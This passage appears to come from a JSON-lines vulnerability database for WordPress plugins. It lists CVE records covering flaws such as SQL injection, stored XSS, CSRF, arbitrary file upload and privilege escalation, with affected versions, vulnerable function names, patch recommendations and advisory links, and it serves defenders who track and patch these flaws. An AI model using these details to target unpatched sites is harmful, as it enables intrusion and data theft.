version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50a89ad1-a3d0-49e3-8d2e-4cb81ac115ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50a89ad1-a3d0-49e3-8d2e-4cb81ac115ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/button.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/button.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007660%40shortcodes-ultimate&new=3007660%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3007660%40shortcodes-ultimate&new=3007660%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1592","slug":"complianz-gdpr","versionImpact":"6.5.6","versionEndExcluding":"7.0.0","description":"The Complianz \u2013 GDPR\/CCPA Cookie Consent plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.6. This is due to missing or incorrect nonce validation on the process_delete function in class-DNSMPD.php. This makes it possible for unauthenticated attackers to delete GDPR data requests via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6226","slug":"shortcodes-ultimate","versionImpact":"5.13.3","versionEndExcluding":"7.0.0","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.13.3 via the su_meta shortcode due to missing validation on the user controlled keys 'key' and 'post_id'. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve arbitrary post meta values which may contain sensitive information when combined with another plugin.","recommendation":"Update to version 7.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d936a48-b300-4a41-8d28-ba34cb3c5cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d936a48-b300-4a41-8d28-ba34cb3c5cb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3050","slug":"site-reviews","versionImpact":"6.11.8","versionEndExcluding":"7.0.0","description":"The Site Reviews WordPress plugin before 7.0.0 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass IP-based blocking","recommendation":"Update to version 7.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c1581e-fd36-49d4-8463-b49915d4b1ac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04c1581e-fd36-49d4-8463-b49915d4b1ac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6225","slug":"shortcodes-ultimate","versionEndExcluding":"7.0.0","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_meta shortcode combined with post meta data in all versions up to, and including, 5.13.3 due to insufficient input sanitization and output escaping on user supplied meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/558e36f6-4678-46a2-8154-42770fbb5574?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/558e36f6-4678-46a2-8154-42770fbb5574?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/meta.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3000576%40shortcodes-ultimate&new=3000576%40shortcodes-ultimate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1273","slug":"nd-shortcodes","versionEndExcluding":"7.0","description":"The ND Shortcodes WordPress plugin before 7.0 does not validate some shortcode attributes before using them to generate paths passed to include function\/s, allowing any authenticated users such as subscriber to perform LFI attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0805ed7e-395d-48de-b484-6c3ec1cd4b8e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0805ed7e-395d-48de-b484-6c3ec1cd4b8e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4623","slug":"nd-shortcodes","versionEndExcluding":"7.0","description":"The ND Shortcodes WordPress plugin before 7.0 does not validate and escape numerous of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3201da-f254-406f-9b4a-cd5025b6b03d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b3201da-f254-406f-9b4a-cd5025b6b03d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-32692","slug":"chauffeur-booking-system","versionImpact":"6.9","versionEndExcluding":"7.0","description":"Missing Authorization vulnerability in QuanticaLabs Chauffeur Taxi Booking System for WordPress allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Chauffeur Taxi Booking System for WordPress: from n\/a through 6.9.","recommendation":"Update to version 7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chauffeur-booking-system\\\/wordpress-chauffeur-taxi-booking-system-for-wordpress-plugin-6-9-broken-authentication-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chauffeur-booking-system\\\/wordpress-chauffeur-taxi-booking-system-for-wordpress-plugin-6-9-broken-authentication-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7442","slug":"gym-management","versionEndExcluding":"67.8.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to SQL Injection via several parameters in the MJ_gmgt_delete_class_limit_for_member, MJ_gmgt_get_yearly_income_expense, MJ_gmgt_get_monthly_income_expense, MJ_gmgt_add_class_limit, MJ_gmgt_view_meeting_detail, and MJ_gmgt_create_meeting functions in all versions up to 67.8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 67.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964?s_rank=2\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964?s_rank=2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52289fe-9a38-4ebf-b24a-034768fa56b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e52289fe-9a38-4ebf-b24a-034768fa56b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9942","slug":"gym-management","versionImpact":"67.1.0","versionEndExcluding":"67.2.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the MJ_gmgt_user_avatar_image_upload() function in all versions up to, and including, 67.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 67.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae5f22d-5085-4230-a7fc-5db85aa6fbdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae5f22d-5085-4230-a7fc-5db85aa6fbdb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9941","slug":"gym-management","versionImpact":"67.1.0","versionEndExcluding":"67.2.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the MJ_gmgt_add_staff_member() function in all versions up to, and including, 67.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to create new user accounts with the administrator role.","recommendation":"Update to version 67.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbff92c1-8492-4d0d-bd90-8fd33625bf6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbff92c1-8492-4d0d-bd90-8fd33625bf6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3622","slug":"blog2social","versionImpact":"6.9.11","versionEndExcluding":"6.9.12","description":"The Blog2Social  plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in versions up to, and including, 6.9.11. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change some plugin settings intended to be modifiable by admins only.","recommendation":"Update to version 6.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5b8d39c-d307-42c9-a972-29b5521a82a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5b8d39c-d307-42c9-a972-29b5521a82a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/6.9.10\\\/includes\\\/B2S\\\/Settings\\\/Item.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/6.9.10\\\/includes\\\/B2S\\\/Settings\\\/Item.php#L116\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2795052%40blog2social&new=2795052%40blog2social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2795052%40blog2social&new=2795052%40blog2social&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2796598%40blog2social&new=2796598%40blog2social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2796598%40blog2social&new=2796598%40blog2social&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12118","slug":"the-events-calendar","versionImpact":"6.9.0","versionEndExcluding":"6.9.1","description":"The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Event Calendar Link Widget through the html_tag attribute in all versions up to, and including, 6.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.8.1\\\/src\\\/Events\\\/Integrations\\\/Plugins\\\/Elementor\\\/Widgets\\\/Event_Calendar_Link.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-events-calendar\\\/tags\\\/6.8.1\\\/src\\\/Events\\\/Integrations\\\/Plugins\\\/Elementor\\\/Widgets\\\/Event_Calendar_Link.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227009\\\/the-events-calendar\\\/tags\\\/6.9.1\\\/src\\\/views\\\/integrations\\\/elementor\\\/widgets\\\/event-calendar-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227009\\\/the-events-calendar\\\/tags\\\/6.9.1\\\/src\\\/views\\\/integrations\\\/elementor\\\/widgets\\\/event-calendar-link.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d67de4f2-b680-49f8-be95-c2464b70f7d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d67de4f2-b680-49f8-be95-c2464b70f7d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0600","slug":"wp-stats-manager","versionEndExcluding":"6.9","description":"The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.9 does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f46df4d-cb80-4d66-846f-85faf2ea0ec4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f46df4d-cb80-4d66-846f-85faf2ea0ec4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2518","slug":"yikes-inc-easy-mailchimp-extender","versionEndExcluding":"6.8.8","description":"The Easy Forms for Mailchimp WordPress plugin through 6.8.8 does not sanitise and escape a parameter before outputting it back in the page when the debug option is enabled, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca120255-2c50-4906-97f3-ea660486db4c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca120255-2c50-4906-97f3-ea660486db4c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1324","slug":"yikes-inc-easy-mailchimp-extender","versionEndExcluding":"6.8.8","description":"The Easy Forms for Mailchimp WordPress plugin before 6.8.8 does not sanitise and escape some parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f510b8c-b97a-44c9-a36d-2d775a4f7b81\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f510b8c-b97a-44c9-a36d-2d775a4f7b81\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1799","slug":"gamipress","versionImpact":"6.8.6","versionEndExcluding":"6.8.7","description":"The GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to SQL Injection via the 'achievement_types' attribute of the gamipress_earnings shortcode in all versions up to, and including, 6.8.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f357fe2a-aa24-42cd-ac2c-c948e18a4710?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051688%40gamipress&new=3051688%40gamipress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1325","slug":"yikes-inc-easy-mailchimp-extender","versionEndExcluding":"6.8.7","description":"The Easy Forms for Mailchimp WordPress plugin before 6.8.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f37cbf3-2388-4582-876c-6a7b0943c2a7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f37cbf3-2388-4582-876c-6a7b0943c2a7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5333","slug":"the-events-calendar","versionImpact":"6.8.2","versionEndExcluding":"6.8.2.1","description":"The Events Calendar WordPress plugin before 6.8.2.1 is missing access checks in the REST API, allowing for unauthenticated users to access information about password protected events.","recommendation":"Update to version 6.8.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/764b5a23-8b51-4882-b899-beb54f684984\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/764b5a23-8b51-4882-b899-beb54f684984\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1725","slug":"file-manager","versionImpact":"6.7","versionEndExcluding":"6.8","description":"The Bit File Manager \u2013 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/tags\\\/6.6.3\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/tags\\\/6.6.3\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ddb481-f989-4ba8-9925-e8327c30de38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84ddb481-f989-4ba8-9925-e8327c30de38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0660","slug":"formidable","versionImpact":"6.7.2","versionEndExcluding":"6.8","description":"The Formidable Forms \u2013 Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026901\\\/formidable\\\/tags\\\/6.8\\\/classes\\\/controllers\\\/FrmFormsController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3026901\\\/formidable\\\/tags\\\/6.8\\\/classes\\\/controllers\\\/FrmFormsController.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4092","slug":"revslider","versionImpact":"6.7.7","versionEndExcluding":"6.7.8","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018htmltag\u2019 parameter in all versions up to, and including, 6.7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure Slider Revolution can be extended to authors.","recommendation":"Update to version 6.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8437abcc-3e34-4a8a-bfe2-2ff7c9f41164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8437abcc-3e34-4a8a-bfe2-2ff7c9f41164?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8107","slug":"revslider","versionImpact":"6.7.18","versionEndExcluding":"6.7.19","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.7.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. By default, this can only be exploited by administrators, but the ability to use and configure Slider Revolution can be extended to authors.","recommendation":"Update to version 6.7.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22b59b36-ba47-4c10-8f43-a29ae3b9d446?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22b59b36-ba47-4c10-8f43-a29ae3b9d446?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/#6-7-19\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/#6-7-19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3780","slug":"wc-frontend-manager","versionImpact":"6.7.16","versionEndExcluding":"6.7.17","description":"The WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wcfm_redirect_to_setup function in all versions up to, and including, 6.7.16. This makes it possible for unauthenticated attackers to view and modify the plugin settings, including payment details and API keys","recommendation":"Update to version 6.7.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.16\\\/core\\\/class-wcfm-admin.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a82493-a6a5-4d8e-8322-942925a54cc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a82493-a6a5-4d8e-8322-942925a54cc3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8290","slug":"wc-frontend-manager","versionImpact":"6.7.12","versionEndExcluding":"6.7.13","description":"The WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.12 via the WCFM_Customers_Manage_Controller::processing function due to missing validation on the ID user controlled key. This makes it possible for authenticated attackers, with subscriber\/customer-level access and above, to change the email address of administrator user accounts which allows them to reset the password and access the administrator account.","recommendation":"Update to version 6.7.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79172fe3-c0cf-48c4-8bc5-862c628c1a09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79172fe3-c0cf-48c4-8bc5-862c628c1a09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.12\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-frontend-manager\\\/tags\\\/6.7.12\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156433\\\/wc-frontend-manager\\\/trunk\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156433\\\/wc-frontend-manager\\\/trunk\\\/controllers\\\/customers\\\/wcfm-controller-customers-manage.php\",\"refsource\":\"\",\"tags\":[]}]"}
